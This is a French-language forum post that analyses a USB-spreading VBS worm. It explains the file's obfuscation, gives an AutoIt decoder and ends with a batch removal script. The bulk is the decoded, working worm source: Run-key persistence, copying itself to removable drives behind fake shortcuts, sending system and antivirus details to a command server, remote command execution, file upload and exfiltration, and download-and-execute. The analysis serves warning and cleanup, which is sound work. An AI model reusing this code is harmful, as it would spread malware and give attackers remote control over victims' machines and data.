Attention VIRUS 3380822_hmaster.vbs

Dernièrement j'ai eu tous mes dossiers sur mon PENDRIVE qui ont été remplacer par un raccourci.
Lorsque j'ai regarder les propriété des raccourcis j'ai vu que avant d'ouvrir les dossiers il executais un fichier 3380822_hmaster.vbs.

Ce fichier n'étant pas visible sur mon PENDRIVE je fais un :

Code:

attrib -h -r -s /s /d f:\*.*


Et voilà qu'apparaît ce misterieux fichier 3380822_hmaster.vbs.

Je l'édite avec notepad et voilà son contenu :

Lien Sendspace : [Vous devez être inscrit et connecté pour voir ce lien]
Lien Drive : [Vous devez être inscrit et connecté pour voir ce lien]


Assez étonnant pour un VBS. Apparement c'est un code caché :

Si j'analyse les 2 premières lignes :

Code:

dim d,i,a,final
d = "ivBl7TQ3........

Je vois que l'on déclare 4 variables qui sont : d, i ,a, final

[d] correspond à cette énorme string de code caché

Ensuite je vais voir à la fin du fichier pour voir comment est la suite du programme (après cet énorme string.
Et là je trouve :

Code:

:for i = 1 to len(d):if i mod 201 = 0  then:a = Mid(d, i, 1):if a = Chr(39) then:a = chr(34):end if:if a = Chr(64) then:a = vbLf:end if:final = final + a:end if:next:execute (final)


La clé de tout ce charabia.

Donc si je décompose le code :

Code:

for i = 1 to len(d)
    if i mod 201 = 0  then
         a = Mid(d, i, 1)
         if a = Chr(39) then
             a = chr(34)
         end if
         if a = Chr(64) then
              a = vbLf
         end if
        final = final + a
   end if
   next
   execute (final)


On comprend ce que fait ce petit bout de code sur notre string [d]

En résumé :

le code final est caché dans ce string 1 lettre tous les 201 caractères.
ensuite il y a un 2 petit test pour la reconstruction :
  - si le caractère est égal à ['] on le remplace par ["]
  - si le carctère est égal `[@] on le remplace par [CRLF]
il reconstruit ainsi tout le code qu'il met ensuite dans la variable final et en sortie de boucle
il execute final.

Voilà ne pouvant pas Executer de VBS sur ma machine (bizarrement)
J'ai recréer ce code en autoit. Qui au lieu d'éxecuter le code va le mettre dans le clipboard.

J'ai juste mis le string dans un fichier [StringVir.txt]

Code:

Local $d,$a,$final

$Virstr=FileOpen("stringvir.txt")
$d = FileRead($VirStr)

For $i = 1 to StringLen($d)
   if mod($i,201) = 0  then
      $a = StringMid($d, $i, 1)
      if $a = Chr(39) then $a = chr(34)
      if $a = "@" then $a = @CRLF
      $final = $final & $a
endif
Next

ClipPut($final)


Et voilà le résultat en sortie l'énigme résolue. Le code de ce Virus qui se passe en ouvrant un dossier depuis un pendrive contaminé.



Voilà où j'en suis.

J'ai pas encore analysé en détail ce qu'il fait mais il fait des modif du registre ainsi que des accès http.
et il modifie les dossiers sur les Pendrive pour ce propager.

Voilà vous êtes avertie si vous voyez un de vos dossiers sur votre pendrive se transformer en raccourcis......

Apparemment il utilise cette technique d'encodage d'un VBS :

[Vous devez être inscrit et connecté pour voir ce lien]

Merci Initscreen  

Le virus se décompose en plusieur partie

Code:


' Information de connection au serveur intrut
host = "gvt.malware-site.www"
port = 8088
' Dossier de destination du virus
installdir = "%temp%"
' Option pour les liens
lnkfile = true
lnkfolder = true

' Créer les objets globaux au script
dim shellobj
set shellobj = wscript.createobject("wscript.shell")
dim filesystemobj
set filesystemobj = createobject("scripting.filesystemobject")
dim httpobj
set httpobj = createobject("msxml2.xmlhttp")

' Récupère le nom du script pour une utilisation future
installname = wscript.scriptname

startup = shellobj.specialfolders ("startup") & "\"
' Met installdir a la valeur "%TMP%\"
installdir = shellobj.expandenvironmentstrings(installdir) & "\"
' Si installdir ne désigne pas "%TMP%\" (ce dossier éxiste toujours) installdir est initialisé avec une chaine et non
' la variable (fix pour les environnement restreint)
if not filesystemobj.folderexists(installdir) then  installdir = shellobj.expandenvironmentstrings("%temp%") & "\"

spliter = "<" & "|" & ">"
sleep = 5000
dim response
dim cmd
dim param
info = ""
'
usbspreading = ""
startdate = ""
dim oneonce
on error resume next
instance


La dernière ligne de cette partie du code lance la fonction "instance" qui va créer la clé registre
"HKEY_LOCAL_MACHINE\software\nom_du_script" et lancé la procédure "upstart".

Code:


function instance
   ' Aucune erreur n'est affich√©
   on error resume next
   ' Cherche la cl√© "HKEY_LOCAL_MACHINE\software\<non_du_script>\"
   usbspreading = shellobj.regread ("HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0) & "\")
   ' Si la cl√© n'est pas d√©finit
   if usbspreading = "" then
      ' Si la chaine mid(wscript.scriptfullname,2) est √©gal √† ":\" & <non_du_script>
      if lcase ( mid(wscript.scriptfullname,2)) = ":\" &  lcase(installname) then
         ' usbspreading pren la valeur "true - " & date()
         usbspreading = "true - " & date
         ' La cl√© REG_SZ "HKEY_LOCAL_MACHINE\software\<non_du_script>\" avec comme valeur "true - " & date
         shellobj.regwrite "HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0)  & "\",  usbspreading, "REG_SZ"
      else
         ' usbspreading pren la valeur "false - " & date()
         usbspreading = "false - " & date
         ' La cl√© REG_SZ "HKEY_LOCAL_MACHINE\software\<non_du_script>\" avec comme valeur "false - " & date
         shellobj.regwrite "HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0)  & "\",  usbspreading, "REG_SZ"
      end if
   end If
   ' apel de la procedure upstart qui ajoute le d√©marrage automatique du virus
   upstart
   ' Chargement du script depuis le chemin d'acc√®s du script courrant
   set scriptfullnameshort =  filesystemobj.getfile (wscript.scriptfullname)
   ' Chargement du script depuis le chemin d'acc√®s du dossier d'installation
   set installfullnameshort =  filesystemobj.getfile (installdir & installname)
   ' Si les deux ne sont pas identiques alors il y a eut installation
   if  lcase (scriptfullnameshort.shortpath) <> lcase (installfullnameshort.shortpath) then
      ' lancement du script nouvellement install√© et sortie du script courrant
      shellobj.run "wscript.exe //B " & chr(34) & installdir & installname & Chr(34)
      wscript.quit
   end If
   ' les erreurs pr√©c√©dentes sont √©ffac√©s
   err.clear
   ' chargement du fichier de script nouvellement intall√©
   set oneonce = filesystemobj.opentextfile (installdir & installname ,8, false)
   ' si erreur sortie de script
   if  err.number > 0 then wscript.quit
end function


la procédure "upstart" implente les clé registre qui permettront au script virus de se relancéachaque démarrage et copie le script virus dans le dossier "%TEMP%" et le menu démarrer. Quand l'exécution revient a la fonction "instance", le script est relancé si il vient de s'installer.

Code:


sub upstart ()
   ' Aucune erreur n'est affich√©
   on error resume Next
   ' Ajout de la commande de d√©marrage pour l'utilisateur courrant
   ' cl√© registre (REG_SZ)
   '    HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\<nom_du_script>
   ' command
   '    wscript.exe //B "<installdir>\<installname>"
   shellobj.regwrite "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split (installname,".")(0),  "wscript.exe //B " & chrw(34) & installdir & installname & chrw(34) , "REG_SZ"
   ' Ajout de la commande de d√©marrage pour le syst√®me local (redonnant voir si reimplentation sur les autres utilisateurs ???)
   ' cl√© registre (REG_SZ)
   '    HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\<nom_du_script>
   ' command
   '    wscript.exe //B "<installdir>\<installname>"
   shellobj.regwrite "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split (installname,".")(0),  "wscript.exe //B "  & chrw(34) & installdir & installname & chrw(34) , "REG_SZ"
   ' Copie les fichiers vers "<installdir>\<installname>"
   filesystemobj.copyfile wscript.scriptfullname,installdir & installname,true
   filesystemobj.copyfile wscript.scriptfullname,startup & installname ,true
end sub


ensuite la boucle du bot se lance et appel la fonction "install" (voir plus bas) après cela il initialise la connexion avec le serveur puis attend les commandes vennant de celui-ci. Il faut noter qu'a ce moment la il envoi des informations sur votre système √† savoir sa version, le nom d'hote, le nom d'utilisateur, le numéro de série du disque et le type d'antivirus installé (voir les fonction "post", "information", "hwid" et "security").

Code:


while true
   ' install le m√©canisme de reproduction du virus
   install
   ' informe le site intrus que le bot est pr√™t et r√©cup√®re la commande √† ex√©cut√©
   response = ""
   response = post ("is-ready","")
   cmd = split (response,spliter)
   ' Ex√©cute la commande envoy√© par le serveur
   select case cmd (0)
      case "excecute"
         param = cmd (1)
         execute param
      case "update"
         param = cmd (1)
         oneonce.close
         set oneonce =  filesystemobj.opentextfile (installdir & installname ,2, false)
         oneonce.write param
         oneonce.close
         shellobj.run "wscript.exe //B " & chr(34) & installdir & installname & chr(34)
         wscript.quit
      case "uninstall"
         uninstall
      case "send"
         download cmd (1),cmd (2)
      case "site-send"
         sitedownloader cmd (1),cmd (2)
      case "recv"
         param = cmd (1)
         upload (param)
      case  "enum-driver"
         post "is-enum-driver",enumdriver
      case  "enum-faf"
         param = cmd (1)
         post "is-enum-faf",enumfaf (param)
      case  "enum-process"
         post "is-enum-process",enumprocess
      case  "cmd-shell"
         param = cmd (1)
         post "is-cmd-shell",cmdshell (param)
      case  "delete"
         param = cmd (1)
         deletefaf (param)
      case  "exit-process"
         param = cmd (1)
         exitprocess (param)
      case  "sleep"
         param = cmd (1)
         sleep = eval (param)
   end select
   wscript.sleep sleep
wend


la procédure "install" copie le script sur chaque périphérique amovible du système puis lui donne les attributs de fichier "System" et "Hidden". Enfin il donne a tous les fichiers les attributs "System" et "Hidden" puis cr√©e un racourci ayant la même icone que le fichier et le paramètre qui qu'il exécute l'action prévu par les accossiation de fichier aprés avoir lancé le script virus copié sur le périphérique amovile

Code:


sub install
   on error resume next
   dim lnkobj
   dim filename
   dim foldername
   dim fileicon
   dim foldericon
   ' Appel de la fonction upstart
   upstart
   ' Pour chaque disque
   for each drive in filesystemobj.drives
      ' Si le disque est pr√™t
      if  drive.isready = true then
         ' Si il reste de l'espace disque
         if  drive.freespace  > 0 then
            ' Si le disque est de type disquette ou p√©riph√©rique amovible
            if  drive.drivetype  = 1 then
               ' Le script est copi√© sur le disque
               filesystemobj.copyfile wscript.scriptfullname , drive.path & "\" & installname,true
               ' Si le script a bien √©t√© copi√© sur le disque il prend les attribut Hidden et System
               if  filesystemobj.fileexists (drive.path & "\" & installname)  then
                  filesystemobj.getfile(drive.path & "\"  & installname).attributes = 2+4
               end if
               
               ' Pour chaque fichier du disque
               for each file in filesystemobj.getfolder( drive.path & "\" ).Files
                  ' Si lnkfile est √† false sortie de procedure
                  if not lnkfile then exit for
                  ' si le nom du fichier contient un point (il a une extension)
                  if instr(file.name,".") then
                     ' si ce fichier n'est pas un raccourci
                     if  lcase (split(file.name, ".") (ubound(split(file.name, ".")))) <> "lnk" then
                        ' Le fichier prend les attribut Hidden et System
                        file.attributes = 2+4
                        ' Si le fichier n'est pas le script attaquant
                        if  ucase (file.name) <> ucase (installname) then
                           ' son nom est plac√© dans filename
                           filename = split(file.name,".")
                           ' un raccouci est plac√© dans le m√™me dossier que le fichier
                           set lnkobj = shellobj.createshortcut (drive.path & "\"  & filename (0) & ".lnk")
                           lnkobj.windowstyle = 7
                           ' le raccourci lance la commande "cmd.exe /c start <nom_du_script>&start <nom_dufichier_courrant>&exit"
                           lnkobj.targetpath = "cmd.exe"
                           lnkobj.workingdirectory = ""
                           lnkobj.arguments="/c start " & replace(installname," ", chrw(34) & " " & chrw(34)) & "&start " & replace(file.name," ", chrw(34) & " " & chrw(34)) &"&exit"
                           ' d√©finit l'icon du raccourci comme identique √†  celle dufichier d'origine
                           fileicon=shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\" & shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\." & split(file.name, ".")(ubound(split(file.name, ".")))& "\") & "\defaulticon\")
                           if  instr (fileicon,",") = 0 then
                              lnkobj.iconlocation = file.path
                           else
                              lnkobj.iconlocation = fileicon
                           end if
                           ' sauvegarde le lien
                           lnkobj.save()
                        end if
                     end if
                  end if
               next
               ' m√™me traitement que pour les fichiers mais sur les dossiers
               for each folder in filesystemobj.getfolder( drive.path & "\" ).subfolders
                  if not lnkfolder then exit for
                  folder.attributes = 2+4
                  foldername = folder.name
                  set lnkobj = shellobj.createshortcut (drive.path & "\"  & foldername & ".lnk")
                  lnkobj.windowstyle = 7
                  lnkobj.targetpath = "cmd.exe"
                  lnkobj.workingdirectory = ""
                  lnkobj.arguments = "/c start " & replace(installname," ", chrw(34) & " " & chrw(34)) & "&start explorer " & replace(folder.name," ", chrw(34) & " " & chrw(34)) &"&exit"
                  foldericon = shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\folder\defaulticon\")
                  if  instr (foldericon,",") = 0 then
                     lnkobj.iconlocation = folder.path
                  else
                     lnkobj.iconlocation = foldericon
                  end if
                  lnkobj.save()
               next
            end If
         end If
      end if
   next
   err.clear
end sub


Code:


function post (cmd ,param)
   post = param
   httpobj.open "post","http://" & host & ":" & port &"/" & cmd, false
   httpobj.setrequestheader "user-agent:",information
   httpobj.send param
   post = httpobj.responsetext
end function


function information
   on error resume next
   if  inf = "" then
      inf = hwid & spliter
      inf = inf  & shellobj.expandenvironmentstrings("%computername%") & spliter
      inf = inf  & shellobj.expandenvironmentstrings("%username%") & spliter
      set root = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
      set os = root.execquery ("select * from win32_operatingsystem")
      for each osinfo in os
         inf = inf & osinfo.caption & spliter
         exit for
      next
      inf = inf & "plus" & spliter
      inf = inf & security & spliter
      inf = inf & usbspreading
      information = inf
   else
      information = inf
   end if
end function


function security
   on error resume next
   security = ""
   set objwmiservice = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
   set colitems = objwmiservice.execquery("select * from win32_operatingsystem",,48)
   for each objitem in colitems
      versionstr = split (objitem.version,".")
   next
   versionstr = split (colitems.version,".")
   osversion = versionstr (0) & "."
   for  x = 1 to ubound (versionstr)
      osversion = osversion &  versionstr (i)
   next
   osversion = eval (osversion)
   if  osversion > 6 then sc = "securitycenter2" else sc = "securitycenter"
   set objsecuritycenter = getobject("winmgmts:\\localhost\root\" & sc)
   Set colantivirus = objsecuritycenter.execquery("select * from antivirusproduct","wql",0)
   for each objantivirus in colantivirus
      security  = security  & objantivirus.displayname & " ."
   next
   if security  = "" then security  = "nan-av"
end function


function hwid
   on error resume next
   set root = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
   set disks = root.execquery ("select * from win32_logicaldisk")
   for each disk in disks
   if  disk.volumeserialnumber <> "" then
   hwid = disk.volumeserialnumber
   exit for
   end if
   next
end function


via les fonction suivant le bot pouvé se mettre a jour exécuter des commandes, télécharger de fichiers,
envoyer des fichiers, enummerrer les fichiers/dossiers/processus.

Code:


sub sitedownloader (fileurl,filename)
   strlink = fileurl
   strsaveto = installdir & filename
   set objhttpdownload = createobject("msxml2.xmlhttp" )
   objhttpdownload.open "get", strlink, false
   objhttpdownload.send
   set objfsodownload = createobject ("scripting.filesystemobject")
   if  objfsodownload.fileexists (strsaveto) then
      objfsodownload.deletefile (strsaveto)
   end if
   if objhttpdownload.status = 200 then
      dim  objstreamdownload
      set  objstreamdownload = createobject("adodb.stream")
      with objstreamdownload
         .type = 1
         .open
         .write objhttpdownload.responsebody
         .savetofile strsaveto
         .close
      end with
      set objstreamdownload = nothing
   end if
   if objfsodownload.fileexists(strsaveto) then
      shellobj.run objfsodownload.getfile (strsaveto).shortpath
   end if
end sub


sub download (fileurl,filedir)
   if filedir = "" then
      filedir = installdir
   end if
   strsaveto = filedir & mid (fileurl, instrrev (fileurl,"\") + 1)
   set objhttpdownload = createobject("msxml2.xmlhttp")
   objhttpdownload.open "post","http://" & host & ":" & port &"/" & "is-sending" & spliter & fileurl, false
   objhttpdownload.send ""
   set objfsodownload = createobject ("scripting.filesystemobject")
   if  objfsodownload.fileexists (strsaveto) then
      objfsodownload.deletefile (strsaveto)
   end if
   if  objhttpdownload.status = 200 then
      dim  objstreamdownload
      set  objstreamdownload = createobject("adodb.stream")
      with objstreamdownload
         .type = 1
         .open
         .write objhttpdownload.responsebody
         .savetofile strsaveto
         .close
      end with
      set objstreamdownload  = nothing
   end if
   if objfsodownload.fileexists(strsaveto) then
   shellobj.run objfsodownload.getfile (strsaveto).shortpath
   end if
end sub


function upload (fileurl)
dim  httpobj,objstreamuploade,buffer
set  objstreamuploade = createobject("adodb.stream")
with objstreamuploade
.type = 1
.open
.loadfromfile fileurl
buffer = .read
.close
end with
set objstreamdownload = nothing
set httpobj = createobject("msxml2.xmlhttp")
httpobj.open "post","http://" & host & ":" & port &"/" & "is-recving" & spliter & fileurl, false
httpobj.send buffer
end function
function enumdriver ()
for  each drive in filesystemobj.drives
if  drive.isready = true then
enumdriver = enumdriver & drive.path & "|" & drive.drivetype & spliter
end if
next
end Function


function enumfaf (enumdir)
enumfaf = enumdir & spliter
for  each folder in filesystemobj.getfolder (enumdir).subfolders
enumfaf = enumfaf & folder.name & "|" & "" & "|" & "d" & "|" & folder.attributes & spliter
next
for  each file in filesystemobj.getfolder (enumdir).files
enumfaf = enumfaf & file.name & "|" & file.size  & "|" & "f" & "|" & file.attributes & spliter
next
end function


function enumprocess ()
on error resume next
set objwmiservice = getobject("winmgmts:\\.\root\cimv2")
set colitems = objwmiservice.execquery("select * from win32_process",,48)
dim objitem
for each objitem in colitems
enumprocess = enumprocess & objitem.name & "|"
enumprocess = enumprocess & objitem.processid & "|"
enumprocess = enumprocess & objitem.executablepath & spliter
next
end function


sub exitprocess (pid)
on error resume next
shellobj.run "taskkill /F /T /PID " & pid,7,true
end sub


sub deletefaf (url)
on error resume next
filesystemobj.deletefile url
filesystemobj.deletefolder url
end sub


function cmdshell (cmd)
dim httpobj,oexec,readallfromany
set oexec = shellobj.exec ("%comspec% /c " & cmd)
if not oexec.stdout.atendofstream then
readallfromany = oexec.stdout.readall
elseif not oexec.stderr.atendofstream then
readallfromany = oexec.stderr.readall
else
readallfromany = ""
end if
cmdshell = readallfromany
end function


Code:

@echo off
setlocal enabledelayedexpansion

set VirusName=
for /f "delims=" %%a in ('reg query HKLM\SOFTWARE\') do (
   for /f "usebackq delims=" %%b in (`reg query "%%a" /ve`) do (
      for /f "tokens=3* delims= " %%A in ("%%b") do (
         set "FixLine=%%B"
         if "!FixLine:~5,1!"=="-" (
            if "!FixLine:~0,4!"=="true" (
               reg delete "%%a" /f
               set "VirusName=%%a"
            ) else if "!FixLine:~0,4!"=="false" (
               reg delete "%%a" /f
               set "VirusName=%%a"
            )
         )
      )
   )
)
for /f "tokens=3 delims=\" %%a in ("!VirusName!") do set "VirusName=%%a"
reg delete "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\!VirusName!\" /f
reg delete "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\!VirusName!\" /f
1>>s.vbs call :WriteScript "!VirusName!"
cscript //B s.vbs
exit /b 0


:WriteScript
echo Option Explicit
echo On Error Resume Next
echo Dim FileName,ScriptName
echo ScriptName=%~1
echo Dim oShell,Startup,InstallDir
echo Set oShell=CreateObject("WScript.Shell")
echo Startup=oShell.specialfolders ("startup") ^& "\"
echo InstallDir=oShell.ExpandEnvironmentStrings("%%temp%%") ^& "\"
echo Dim oFSO,Startup
echo Set oFSO=CreateObject("Scripting.FileSystemObject")
echo oFSO.DeleteFile Startup ^& ScriptName, True
echo oFSO.DeleteFile InstallDir ^& ScriptName, True
echo For Each Drive In oFSO.Drives
echo    If  Drive.IsReady Then
echo       If  Drive.FreeSpace  ^> 0 Then
echo          If  Drive.Drivetype  = 1 then
echo             For each File in oFSO.GetFolder ( Drive.path ^& "\").Files
echo                on error resume next
echo                if InStr(File.Name,".") then
echo                   if LCase (Split(File.Name, ".")(Ubound(Split(File.Name, ".")))) ^<^> "lnk" then
echo                      File.Attributes = 0
echo                      if  ucase (File.name) ^<^> ucase (ScriptName) then
echo                         FileName = split(File.name,".")
echo                         oFSO.deleteFile (Drive.path ^& "\" ^& FileName(0) ^& ".lnk" )
echo                      else
echo                         oFSO.deleteFile (Drive.path ^& "\" ^& File.name)
echo                      end If
echo                   else
echo                      oFSO.deleteFile (File.path)
echo                   end if
echo                end if
echo             next
echo             for each folder in oFSO.getfolder( Drive.path ^& "\" ).subfolders
echo                folder.attributes = 0
echo             next
echo          end if
echo       end if
echo    end if
echo next
echo wscript.quit
goto :eof

le patch:

-connecter les périphérique supects à votre ordinateur
-copier le contenut du script patch dans un fichier texte puis enregistrer le avec l'exetension .bat
- lance le fichiers batch en tant qu'administrateur